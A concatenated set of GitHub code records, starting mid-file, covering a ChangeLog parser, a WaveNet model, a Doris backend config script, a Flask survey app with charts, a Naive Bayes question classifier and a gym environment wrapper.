entry: no extra newline\n pkgs.append('\\n'.join(pkg_lines))\n return pkgs\n\n def parse_pkg(self, data, entry):\n \"\"\"\n Parse a single package.\n\n :param data: :py:class:`unicode` -- Package name and description of the update.\n :param entry: :any:`SlackLogEntry` -- in-memory representation of the ChangeLog entry being parsed.\n :return: :any:`SlackLogPkg` -- in-memory representation of the package.\n \"\"\"\n assert(isinstance(data, str))\n assert(isinstance(entry, SlackLogEntry))\n self.PKG += 1\n try:\n pkg, data = self.parse_pkg_name(data)\n except ValueError:\n print(\"data: '%s...'\" % data[0:50])\n raise\n description = self.parse_pkg_description(data)\n return SlackLogPkg(pkg, description, entry)\n\n def parse_pkg_name(self, data):\n \"\"\"\n Parse package name from a package.\n\n :param data: :py:class:`unicode` -- Package name and description.\n :return: [:py:class:`unicode`, :py:class:`unicode`] -- a two element list: package name and package description.\n \"\"\"\n assert(isinstance(data, str))\n return data.split(u':', 1)\n\n def parse_pkg_description(self, data):\n \"\"\"\n Parse package description from a package.\n\n :param data: :py:class:`unicode` -- Package description.\n :return: :py:class:`unicode` -- Package description.\n \"\"\"\n assert(isinstance(data, str))\n return data\n\n def get_line(self, data):\n \"\"\"\n Consume one line from data.\n\n :param data: :py:class:`unicode` -- Data.\n :return: [:py:class:`unicode`, :py:class:`unicode`] -- a two element list: first line, rest of the data.\n \"\"\"\n assert(isinstance(data, str))\n try:\n line, data = data.split(u'\\n', 1)\n line += u'\\n'\n except ValueError: # No newlines\n line = data\n data = u''\n return [line, data]\n\n def parse_date(self, data):\n \"\"\"\n Parse a time string into a timestamp.\n\n :param data: :py:class:`unicode` -- Time string.\n :return: :py:class:`datetime.datetime` -- Timestamp in UTC timezone.\n \"\"\"\n if data is None:\n return None\n timestamp, timezone = self.parse_date_with_timezone(data)\n return timestamp\n\n def parse_date_with_timezone(self, data):\n \"\"\"\n Parse a time string into a timestamp.\n\n :param data: :py:class:`unicode` -- Time string.\n :return: [:py:class:`datetime.datetime`, :py:class:`tzinfo`] -- a two element list: Timestamp in UTC timezone, and the original timezone.\n \"\"\"\n if data is None:\n return None\n assert(isinstance(data, str))\n timestamp = parser.parse(data, tzinfos=tzinfos)\n timezone = timestamp.tzinfo\n if timezone is None:\n # Timestamp was ambiguous, assume UTC\n if not self.quiet:\n from sys import stderr\n stderr.write(\"Warning: Assuming UTC, input was '%s'\" % data)\n timestamp = timestamp.replace(tzinfo=tz.tzutc())\n elif timestamp.tzinfo.utcoffset(timestamp).total_seconds() != 0:\n # Timestamp was in some local timezone,\n # convert to UTC\n tzname = timezone.tzname(timestamp)\n if not self.quiet and tzname not in tzinfos:\n from sys import stderr\n stderr.write(\"Warning: Converting '%s' to UTC\" % tzname)\n timestamp = timestamp.astimezone(tz.tzutc())\n return [timestamp, timezone]\n","repo_name":"vmj/slacklog","sub_path":"slacklog/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":11578,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"39842247129","text":"from setuptools import find_packages,setup\nfrom os import path\n\nPROJECT_ROOT = path.abspath(path.dirname(__file__))\nPACKAGE_NAME = \"nm_boostpython\"\nPACKAGE_ROOT = path.join(PROJECT_ROOT, PACKAGE_NAME)\n\n#重要:添加除py文件之外的文件\npackage_data = {PACKAGE_NAME: ['nm_boostpython.so']} # warning this must be '' not \"\"\n\nsetup(name='nm_boostpython',\n version='0.0.1',\n description='A test for PyPI',\n author='nervermore',\n author_email='154411296@qq,com',\n url='https://www.python.org/',\n license='MIT',\n keywords='ga nn',\n packages=find_packages(where=PROJECT_ROOT, exclude=(\"docs\", \"tests\", \".github\")),\n package_data = package_data,\n python_requires='>=3.0'\n)","repo_name":"NerverMoreGitHub/nm_boostpyton","sub_path":"py_wheel/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29508838089","text":"import tensorflow as tf\r\n\r\nfrom .ops import mu_law_encode\r\nfrom .mixture import discretized_mix_logistic_loss, sample_from_discretized_mix_logistic\r\n\r\n\r\nclass WaveNetModel(object):\r\n def __init__(self, batch_size, dilations, filter_width, residual_channels, dilation_channels, skip_channels,\r\n quantization_channels=2 ** 8, out_channels=30,\r\n use_biases=False, scalar_input=False, initial_filter_width=32, global_condition_channels=None,\r\n global_condition_cardinality=None, local_condition_channels=80, upsample_factor=None, train_mode=True):\r\n\r\n self.batch_size = batch_size\r\n self.dilations = dilations\r\n self.filter_width = filter_width\r\n self.residual_channels = residual_channels\r\n self.dilation_channels = dilation_channels\r\n self.quantization_channels = quantization_channels\r\n self.use_biases = use_biases\r\n self.skip_channels = skip_channels\r\n self.scalar_input = scalar_input\r\n self.initial_filter_width = initial_filter_width\r\n self.global_condition_channels = global_condition_channels\r\n self.global_condition_cardinality = global_condition_cardinality\r\n self.local_condition_channels = local_condition_channels\r\n self.upsample_factor = upsample_factor\r\n self.train_mode = train_mode\r\n self.receptive_field = WaveNetModel.calculate_receptive_field(self.filter_width, self.dilations,\r\n self.scalar_input, self.initial_filter_width)\r\n self.out_channels = out_channels\r\n\r\n self.ema = tf.train.ExponentialMovingAverage(decay=0.9999)\r\n\r\n @staticmethod\r\n def calculate_receptive_field(filter_width, dilations, scalar_input, initial_filter_width):\r\n receptive_field = (filter_width - 1) * sum(\r\n dilations) + 1\r\n if scalar_input:\r\n receptive_field += initial_filter_width - 1\r\n else:\r\n receptive_field += filter_width - 1\r\n return receptive_field\r\n\r\n def _create_causal_layer(self, input_batch):\r\n with tf.name_scope('causal_layer'):\r\n if self.scalar_input:\r\n return tf.layers.conv1d(input_batch, filters=self.residual_channels,\r\n kernel_size=self.initial_filter_width, padding='valid', dilation_rate=1,\r\n use_bias=False)\r\n else:\r\n return tf.layers.conv1d(input_batch, filters=self.residual_channels, kernel_size=self.filter_width,\r\n padding='valid', dilation_rate=1, use_bias=False)\r\n\r\n def _create_queue(self):\r\n with tf.variable_scope('queue'):\r\n if self.scalar_input:\r\n self.causal_queue = tf.Variable(\r\n initial_value=tf.zeros(shape=[self.batch_size, self.initial_filter_width, 1], dtype=tf.float32),\r\n name='causal_queue', trainable=False)\r\n else:\r\n self.causal_queue = tf.Variable(\r\n initial_value=tf.zeros(shape=[self.batch_size, self.filter_width, self.quantization_channels],\r\n dtype=tf.float32), name='causal_queue', trainable=False)\r\n\r\n self.local_condition_queue = tf.Variable(\r\n initial_value=tf.zeros(shape=[self.batch_size, self.filter_width, self.local_condition_channels],\r\n dtype=tf.float32), name='local_condition_queue', trainable=False)\r\n\r\n self.dilation_queue = []\r\n for i, d in enumerate(self.dilations):\r\n q = tf.Variable(initial_value=tf.zeros(\r\n shape=[self.batch_size, d * (self.filter_width - 1) + 1, self.dilation_channels], dtype=tf.float32),\r\n name='dilation_queue'.format(i), trainable=False)\r\n self.dilation_queue.append(q)\r\n\r\n self.queue_initializer = tf.variables_initializer(\r\n self.dilation_queue + [self.causal_queue, self.local_condition_queue])\r\n\r\n def _create_dilation_layer(self, input_batch, layer_index, dilation, local_condition_batch, global_condition_batch,\r\n output_width):\r\n with tf.variable_scope('dilation_layer'):\r\n conv_filter = tf.layers.conv1d(input_batch, filters=self.dilation_channels, kernel_size=self.filter_width,\r\n dilation_rate=dilation, padding='valid', use_bias=self.use_biases,\r\n name='conv_filter')\r\n conv_gate = tf.layers.conv1d(input_batch, filters=self.dilation_channels, kernel_size=self.filter_width,\r\n dilation_rate=dilation, padding='valid', use_bias=self.use_biases,\r\n name='conv_gate')\r\n\r\n if global_condition_batch is not None:\r\n conv_filter += tf.layers.conv1d(global_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"gc_filter\")\r\n conv_gate += tf.layers.conv1d(global_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"gc_gate\")\r\n\r\n if local_condition_batch is not None:\r\n local_filter = tf.layers.conv1d(local_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"lc_filter\")\r\n local_gate = tf.layers.conv1d(local_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"lc_gate\")\r\n\r\n local_filter = tf.slice(local_filter, [0, 0, 0], [-1, tf.shape(conv_filter)[1], -1])\r\n local_gate = tf.slice(local_gate, [0, 0, 0], [-1, tf.shape(conv_gate)[1], -1])\r\n\r\n conv_filter += local_filter\r\n conv_gate += local_gate\r\n\r\n out = tf.tanh(conv_filter) * tf.sigmoid(conv_gate)\r\n\r\n # The 1x1 conv to produce the residual output == FC\r\n transformed = tf.layers.conv1d(out, filters=self.residual_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases, name=\"dense\")\r\n\r\n # The 1x1 conv to produce the skip output\r\n skip_cut = tf.shape(out)[1] - output_width\r\n out_skip = tf.slice(out, [0, skip_cut, 0], [-1, -1, self.dilation_channels])\r\n skip_contribution = tf.layers.conv1d(out_skip, filters=self.skip_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases, name=\"skip\")\r\n\r\n input_cut = tf.shape(input_batch)[1] - tf.shape(transformed)[1]\r\n input_batch = tf.slice(input_batch, [0, input_cut, 0], [-1, -1, -1])\r\n\r\n return skip_contribution, input_batch + transformed\r\n\r\n def create_upsample(self, local_condition_batch):\r\n local_condition_batch = tf.expand_dims(local_condition_batch, [3])\r\n # local condition batch N H W C\r\n\r\n for i in range(len(self.upsample_factor)):\r\n local_condition_batch = tf.layers.conv2d_transpose(local_condition_batch, filters=1,\r\n kernel_size=(self.upsample_factor[i], self.filter_width),\r\n strides=(self.upsample_factor[i], 1), padding='same',\r\n use_bias=False, name='upsample{}'.format(i))\r\n\r\n local_condition_batch = tf.squeeze(local_condition_batch, [3])\r\n return local_condition_batch\r\n\r\n def _create_network(self, input_batch, local_condition_batch, global_condition_batch):\r\n '''Construct the WaveNet network.'''\r\n\r\n if not self.train_mode:\r\n self._create_queue()\r\n\r\n outputs = []\r\n current_layer = input_batch\r\n if not self.train_mode:\r\n self.causal_queue = tf.scatter_update(self.causal_queue, tf.range(self.batch_size),\r\n tf.concat([self.causal_queue[:, 1:, :], input_batch], axis=1))\r\n current_layer = self.causal_queue\r\n\r\n self.local_condition_queue = tf.scatter_update(self.local_condition_queue, tf.range(self.batch_size),\r\n tf.concat([self.local_condition_queue[:, 1:, :],\r\n local_condition_batch], axis=1))\r\n local_condition_batch = self.local_condition_queue\r\n\r\n # Pre-process the input with a regular convolution\r\n current_layer = self._create_causal_layer(current_layer)\r\n\r\n if self.train_mode:\r\n output_width = tf.shape(input_batch)[\r\n 1] - self.receptive_field + 1\r\n else:\r\n output_width = 1\r\n\r\n # Add all defined dilation layers.\r\n with tf.variable_scope('dilated_stack'):\r\n for layer_index, dilation in enumerate(\r\n self.dilations):\r\n with tf.variable_scope('layer{}'.format(layer_index)):\r\n\r\n if not self.train_mode:\r\n self.dilation_queue[layer_index] = tf.scatter_update(self.dilation_queue[layer_index],\r\n tf.range(self.batch_size), tf.concat(\r\n [self.dilation_queue[layer_index][:, 1:, :], current_layer], axis=1))\r\n current_layer = self.dilation_queue[layer_index]\r\n\r\n output, current_layer = self._create_dilation_layer(current_layer, layer_index, dilation,\r\n local_condition_batch, global_condition_batch,\r\n output_width)\r\n outputs.append(output)\r\n with tf.name_scope('postprocessing'):\r\n # Perform (+) -> ReLU -> 1x1 conv -> ReLU -> 1x1 conv to\r\n # postprocess the output.\r\n\r\n # We skip connections from the outputs of each layer, adding them\r\n # all up here.\r\n total = sum(outputs)\r\n transformed1 = tf.nn.relu(total)\r\n conv1 = tf.layers.conv1d(transformed1, filters=self.skip_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases)\r\n\r\n transformed2 = tf.nn.relu(conv1)\r\n if self.scalar_input:\r\n conv2 = tf.layers.conv1d(transformed2, filters=self.out_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases)\r\n else:\r\n conv2 = tf.layers.conv1d(transformed2, filters=self.quantization_channels, kernel_size=1,\r\n padding=\"same\", use_bias=self.use_biases)\r\n\r\n return conv2\r\n\r\n def _one_hot(self, input_batch):\r\n '''One-hot encodes the waveform amplitudes.\r\n\r\n This allows the definition of the network as a categorical distribution\r\n over a finite set of possible amplitudes.\r\n '''\r\n with tf.name_scope('one_hot_encode'):\r\n encoded = tf.one_hot(input_batch, depth=self.quantization_channels,\r\n dtype=tf.float32) # (1, ?, 1) --> (1, ?, 1, 256)\r\n shape = [self.batch_size, -1, self.quantization_channels]\r\n encoded = tf.reshape(encoded, shape) # (1, ?, 1, 256) --> (1, ?, 256)\r\n return encoded\r\n\r\n def _embed_gc(self, global_condition):\r\n '''Returns embedding for global condition.\r\n :param global_condition: Either ID of global condition for\r\n tf.nn.embedding_lookup or actual embedding. The latter is\r\n experimental.\r\n :return: Embedding or None\r\n '''\r\n embedding = None\r\n if self.global_condition_cardinality is not None:\r\n # Only lookup the embedding if the global condition is presented\r\n # as an integer of mutually-exclusive categories ...\r\n embedding_table = tf.get_variable('gc_embedding',\r\n [self.global_condition_cardinality, self.global_condition_channels],\r\n dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer(\r\n uniform=False))\r\n embedding = tf.nn.embedding_lookup(embedding_table, global_condition)\r\n elif global_condition is not None:\r\n # In this case, the number of global_embedding channels must be\r\n # equal to the the last dimension of the global_condition tensor.\r\n gc_batch_rank = len(global_condition.get_shape())\r\n dims_match = (global_condition.get_shape()[gc_batch_rank - 1] == self.global_condition_channels)\r\n if not dims_match:\r\n raise ValueError('Shape of global_condition {} does not match global_condition_channels {}.'.format(\r\n global_condition.get_shape(),\r\n self.global_condition_channels))\r\n embedding = global_condition\r\n\r\n if embedding is not None:\r\n embedding = tf.reshape(embedding, [self.batch_size, 1, self.global_condition_channels])\r\n\r\n return embedding\r\n\r\n def predict_proba_incremental(self, waveform, upsampled_local_condition=None, global_condition=None,\r\n name='wavenet'):\r\n \"\"\"\r\n local_condition: upsampled local condition\r\n \"\"\"\r\n\r\n with tf.variable_scope(name):\r\n\r\n if self.scalar_input:\r\n encoded = tf.reshape(waveform, [self.batch_size, -1, 1])\r\n else:\r\n encoded = tf.one_hot(waveform, self.quantization_channels)\r\n encoded = tf.reshape(encoded,\r\n [self.batch_size, -1, self.quantization_channels]) # encoded shape=(N,1, 256)\r\n\r\n gc_embedding = self._embed_gc(global_condition) # --> shape=(1, 1, 32)\r\n\r\n # local condition\r\n if upsampled_local_condition is not None:\r\n upsampled_local_condition = tf.reshape(upsampled_local_condition,\r\n [self.batch_size, -1, self.local_condition_channels])\r\n\r\n raw_output = self._create_network(encoded, upsampled_local_condition,\r\n gc_embedding)\r\n\r\n if self.scalar_input:\r\n out = tf.reshape(raw_output, [self.batch_size, -1, self.out_channels])\r\n proba = sample_from_discretized_mix_logistic(out)\r\n else:\r\n out = tf.reshape(raw_output, [self.batch_size, self.quantization_channels])\r\n proba = tf.cast(tf.nn.softmax(tf.cast(out, tf.float64)), tf.float32)\r\n\r\n return proba\r\n\r\n def add_loss(self, input_batch, local_condition=None, global_condition_batch=None, l2_regularization_strength=None,\r\n name='wavenet'):\r\n '''Creates a WaveNet network and returns the autoencoding loss.\r\n\r\n The variables are all scoped to the given name.\r\n '''\r\n with tf.variable_scope(name):\r\n encoded_input = mu_law_encode(input_batch,\r\n self.quantization_channels)\r\n\r\n gc_embedding = self._embed_gc(\r\n global_condition_batch)\r\n encoded = self._one_hot(encoded_input) # (1, ?, quantization_channels=256)\r\n if self.scalar_input:\r\n network_input = tf.reshape(tf.cast(input_batch, tf.float32), [self.batch_size, -1, 1])\r\n else:\r\n network_input = encoded\r\n\r\n # Cut off the last sample of network input to preserve causality.\r\n network_input_width = tf.shape(network_input)[1] - 1\r\n if self.scalar_input:\r\n input = tf.slice(network_input, [0, 0, 0], [-1, network_input_width, 1])\r\n else:\r\n input = tf.slice(network_input, [0, 0, 0], [-1, network_input_width, self.quantization_channels])\r\n\r\n # local condition\r\n if local_condition is not None:\r\n local_condition = self.create_upsample(local_condition)\r\n\r\n raw_output = self._create_network(input, local_condition,\r\n gc_embedding)\r\n\r\n with tf.name_scope('loss'):\r\n # Cut off the samples corresponding to the receptive field\r\n # for the first predicted sample.\r\n target_output = tf.slice(network_input, [0, self.receptive_field, 0],\r\n [-1, -1, -1])\r\n\r\n if self.scalar_input:\r\n loss = discretized_mix_logistic_loss(raw_output, target_output, num_class=2 ** 16, reduce=False)\r\n reduced_loss = tf.reduce_mean(loss)\r\n else:\r\n target_output = tf.reshape(target_output, [-1, self.quantization_channels])\r\n prediction = tf.reshape(raw_output, [-1, self.quantization_channels])\r\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(logits=prediction, labels=target_output)\r\n reduced_loss = tf.reduce_mean(loss)\r\n\r\n tf.summary.scalar('loss', reduced_loss)\r\n\r\n if l2_regularization_strength is None:\r\n self.loss = reduced_loss\r\n else:\r\n # L2 regularization for all trainable parameters\r\n l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if not ('bias' in v.name)])\r\n\r\n # Add the regularization term to the loss\r\n total_loss = (reduced_loss + l2_regularization_strength * l2_loss)\r\n\r\n tf.summary.scalar('l2_loss', l2_loss)\r\n tf.summary.scalar('total_loss', total_loss)\r\n\r\n self.loss = total_loss\r\n\r\n def add_optimizer(self, hparams, global_step):\r\n '''Adds optimizer to the graph. Supposes that initialize function has already been called.\r\n '''\r\n with tf.variable_scope('optimizer'):\r\n hp = hparams\r\n\r\n learning_rate = tf.train.exponential_decay(hp.wavenet_learning_rate, global_step, hp.wavenet_decay_steps,\r\n hp.wavenet_decay_rate)\r\n\r\n # Adam optimization\r\n self.learning_rate = learning_rate\r\n optimizer = tf.train.AdamOptimizer(learning_rate)\r\n\r\n gradients, variables = zip(\r\n *optimizer.compute_gradients(self.loss)) # len(tf.trainable_variables()) = len(variables)\r\n self.gradients = gradients\r\n\r\n # Gradients clipping\r\n if hp.wavenet_clip_gradients:\r\n clipped_gradients, _ = tf.clip_by_global_norm(gradients, 1.)\r\n else:\r\n clipped_gradients = gradients\r\n\r\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n adam_optimize = optimizer.apply_gradients(zip(clipped_gradients, variables), global_step=global_step)\r\n\r\n # https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage\r\n # Use adam optimization process as a dependency\r\n with tf.control_dependencies([adam_optimize]):\r\n # Create the shadow variables and add ops to maintain moving averages\r\n # Also updates moving averages after each update step\r\n # This is the optimize call instead of traditional adam_optimize one.\r\n assert tuple(tf.trainable_variables()) == variables # Verify all trainable variables are being averaged\r\n self.optimize = self.ema.apply(variables)\r\n","repo_name":"YunhoJung/tobigs-rhapsody-speech-synthesis","sub_path":"model/wavenet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72687389221","text":"import time\nimport threading\n\nimport env_config\nimport execute\n\n\ndef modify_config(host_name, filepath, option, value):\n \"\"\"修改配置\n \"\"\"\n cmd = \"grep -q '^{option}' {filepath} && \" \\\n \"sed -i 's/^{option}.*/{option} = {value}/g' {filepath} || \" \\\n \"echo '{option} = {value}' >> {filepath}\".format(\n option=option, value=value, filepath=filepath)\n status, output = execute.exe_cmd(cmd, host_name)\n if status != 0:\n return False\n cmd = \"grep -q '^{} = {}' {}\".format(option, value, filepath)\n status, output = execute.exe_cmd(cmd, host_name)\n if status != 0:\n return False\n return True\n\n\ndef remove_config(host_name, filepath, option):\n \"\"\"删除配置\n \"\"\"\n cmd = 'sed -i \"s/^%s.*/ /\" %s' % (option, filepath)\n execute.exe_cmd(cmd, host_name)\n cmd = \"grep -q '^{} {}'\".format(option, filepath)\n status, output = execute.exe_cmd(cmd, host_name)\n if status == 0:\n return False\n return True\n\n\ndef modify_be_config(host_name, path, option, value):\n \"\"\"\n modify be config\n \"\"\"\n filepath = '%s/conf/be.conf' % path\n return modify_config(host_name, filepath, option, value)\n\n\ndef config_one_be(host_name):\n \"\"\"config one be\n \"\"\"\n filepath = '%s/be/conf/be.conf' % env_config.be_path\n modify_config(host_name, filepath, 'be_port', env_config.be_port)\n modify_config(host_name, filepath, 'webserver_port', env_config.webserver_port)\n modify_config(host_name, filepath, 'heartbeat_service_port', env_config.heartbeat_service_port)\n modify_config(host_name, filepath, 'be_rpc_port', env_config.be_rpc_port)\n modify_config(host_name, filepath, 'brpc_port', env_config.brpc_port)\n time.sleep(3)\n\n\ndef config_be():\n \"\"\"config be\n \"\"\"\n config_be_threads = []\n for host_name in env_config.be_list + env_config.dynamic_add_be_list:\n t = threading.Thread(target=config_one_be, args=(host_name,))\n t.start()\n config_be_threads.append(t)\n\n for t in config_be_threads:\n t.join()\n\n\nif __name__ == '__main__':\n config_be()\n","repo_name":"apache/doris","sub_path":"pytest/deploy/config_be.py","file_name":"config_be.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":10091,"dataset":"github-code","pt":"35"} +{"seq_id":"42942837964","text":"from flask import Flask, render_template, request, redirect, url_for, flash\r\nfrom flask_mysqldb import MySQL\r\nimport plotly.graph_objs as go\r\nfrom plotly.offline import plot\r\n\r\napp = Flask(__name__)\r\napp.config['MYSQL_HOST'] = 'localhost'\r\napp.config['MYSQL_USER'] = 'root'\r\napp.config['MYSQL_PASSWORD'] = 'ABHI@1289' \r\napp.config['MYSQL_DB'] = 'flaskapp'\r\napp.config['SECRET_KEY'] = 'secret_key'\r\napp.config['TEMPLATES_AUTO_RELOAD'] = True\r\n\r\nmysql = MySQL(app)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('form.html')\r\n\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n name = request.form['name']\r\n age = request.form['age']\r\n gender = request.form['gender']\r\n mobile = request.form['mobile']\r\n grade = request.form['grade']\r\n\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"INSERT INTO users(name, age, gender, mobile, grade) VALUES(%s, %s, %s, %s, %s)\",\r\n (name, age, gender, mobile, grade))\r\n mysql.connection.commit()\r\n cur.close()\r\n\r\n flash('Submitted successfully!', 'success')\r\n return redirect(url_for('index'))\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if request.method == 'POST':\r\n userid = request.form['userid']\r\n password = request.form['password']\r\n if userid == '100' and password == '200':\r\n return redirect(url_for('data'))\r\n else:\r\n flash('Invalid credentials!', 'error')\r\n return redirect(url_for('login'))\r\n return render_template('login.html')\r\n\r\n\r\n@app.route('/data')\r\ndef data():\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"SELECT COUNT(*) FROM users\")\r\n total_users = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE age BETWEEN 0 AND 10\")\r\n age_0_10 = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE age BETWEEN 11 AND 20\")\r\n age_11_20 = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE age BETWEEN 21 AND 30\")\r\n age_21_30 = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE gender='Male'\")\r\n male_count = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE gender='Female'\")\r\n female_count = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE mobile='Yes'\")\r\n mobile_yes = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE mobile='No'\")\r\n mobile_no = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE grade='A'\")\r\n grade_a = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE grade='B'\")\r\n grade_b = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE grade='C'\")\r\n grade_c = cur.fetchone()[0]\r\n\r\n cur.close()\r\n\r\n age_labels = ['0-10', '11-20', '21-30']\r\n age_values = [age_0_10, age_11_20, age_21_30]\r\n\r\n gender_labels = ['Male', 'Female']\r\n gender_values = [male_count, female_count]\r\n\r\n mobile_labels = ['Yes', 'No']\r\n mobile_values = [mobile_yes, mobile_no]\r\n\r\n grade_labels = ['A', 'B', 'C']\r\n grade_values = [grade_a, grade_b, grade_c]\r\n\r\n age_chart_labels = age_labels\r\n age_chart_values = age_values\r\n gender_chart_labels = gender_labels\r\n gender_chart_values = gender_values\r\n mobile_chart_labels = mobile_labels\r\n mobile_chart_values = mobile_values\r\n grade_chart_labels = grade_labels\r\n grade_chart_values = grade_values\r\n\r\n return render_template('data.html', total_users=total_users,\r\n age_chart_labels=age_chart_labels, age_chart_values=age_chart_values,\r\n gender_chart_labels=gender_chart_labels, gender_chart_values=gender_chart_values,\r\n mobile_chart_labels=mobile_chart_labels, mobile_chart_values=mobile_chart_values,\r\n grade_chart_labels=grade_chart_labels, grade_chart_values=grade_chart_values)\r\n\r\ndef create_pie_chart(labels, values, title):\r\n data = [go.Pie(labels=labels, values=values)]\r\n layout = go.Layout(title=title)\r\n\r\n fig = go.Figure(data=data, layout=layout)\r\n chart_data = plot(fig, output_type='div', include_plotlyjs=False)\r\n\r\n return chart_data\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"pavankalyan75/khub-problem-statement","sub_path":"prooo/KHUB Pro/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7210941116","text":"import time\nimport numpy as np\nN = 10000000\n\ndef addVectors(v1:np.ndarray ,v2: np.ndarray):\n v3: np.ndarray = np.ones(N)\n for i in range(len(v1)):\n v3[i] = v1[i] + v2[i]\n return v3\n\ndef main():\n ones: np.ndarray = np.ones(N)\n negativeONes: np.ndarray = np.ones(N)*-1\n \n start = time.time()\n zeros: np.ndarray = addVectors(ones,negativeONes)\n end = time.time()\n print(\"Elapsed = %s\" % (end - start))\n \n\n if(zeros.size != N):\n raise Exception(\"Summed Vector is Wrong Size\")\n \n if not(np.array_equal(zeros,np.zeros(N))):\n raise Exception(\"Incorrect Summation for Zeros\")\n\n print(\"Completed Summation\")\n\nmain()\n","repo_name":"InvincibleRMC/csds438final","sub_path":"serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15656010500","text":"\nimport pandas as pd\nfrom pandas import Series, DataFrame\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport os\nimport re\nimport jieba\n\n# Get all the documents\ndef getfilelist(root_path):\n file_path_list=[]\n file_name=[]\n walk = os.walk(root_path)\n for root, dirs, files in walk:\n for name in files:\n filepath = os.path.join(root, name)\n file_name.append(name)\n file_path_list.append(filepath)\n # print(file_name)\n # print(file_path_list)\n # print(len(file_path_list))\n return file_path_list\n\n\nclass Question_classify():\n def __init__(self):\n '''\n Initialization\n '''\n self.train_x,self.train_y=self.read_train_data() # read the training data\n self.model=self.train_model_NB() # train the model\n\n def read_train_data(self):\n '''\n Get the training data\n '''\n train_x=[]\n train_y=[]\n file_list=getfilelist(\"./data/question/\")\n\n # search all the files\n for one_file in file_list:\n # get the number\n num = re.sub(r'\\D', \"\", one_file)\n if str(num).strip()!=\"\":\n label_num=int(num) # set the tag\n with(open(one_file,\"r\",encoding=\"utf-8\")) as fr: # read the file context\n data_list=fr.readlines()\n for one_line in data_list:\n word_list=list(jieba.cut(str(one_line).strip()))\n train_x.append(\" \".join(word_list))\n train_y.append(label_num)\n return train_x,train_y\n\n def train_model_NB(self):\n '''\n train the model: Naive Bayes\n '''\n X_train, y_train = self.train_x, self.train_y\n self.tv = TfidfVectorizer()\n\n train_data = self.tv.fit_transform(X_train).toarray()\n clf = MultinomialNB(alpha=0.01)\n clf.fit(train_data, y_train)\n return clf\n\n def predict(self,question):\n '''\n function for prediction\n '''\n question=[\" \".join(list(jieba.cut(question)))]\n test_data=self.tv.transform(question).toarray()\n y_predict = self.model.predict(test_data)[0]\n # print(\"question type:\",y_predict)\n return y_predict\n\nif __name__ == '__main__':\n qc=Question_classify()\n qc.predict(\"张学友的个人信息\")\n","repo_name":"ZaccWu/QA-based-on-web","sub_path":"KGClass.py","file_name":"KGClass.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2972886581","text":"\r\nimport gym\r\nimport random\r\nimport time\r\nimport numpy as np\r\nimport cv2\r\n\r\nfrom threading import Thread\r\nfrom multiprocessing import Process, Pipe\r\nfrom queue import Queue\r\n\r\nfrom history import History\r\n\r\n\r\nclass Env(object):\r\n def __init__(self, config):\r\n self.cf = config\r\n self.game = self.cf.game\r\n self.history = History(self.cf)\r\n self.env = gym.make(self.game + self.cf.env_versions)\r\n self.action_n = self.env.action_space.n\r\n self._obs = np.zeros((2,) + self.env.observation_space.shape, dtype=np.uint8)\r\n self.real_done = True\r\n print('env: ', self.game, self.action_n)\r\n\r\n def reset(self):\r\n self.history.clear()\r\n self._obs[:] = 0\r\n if not self.real_done:\r\n s, r, d = self.act(0)\r\n else:\r\n obs = self.env.reset()\r\n 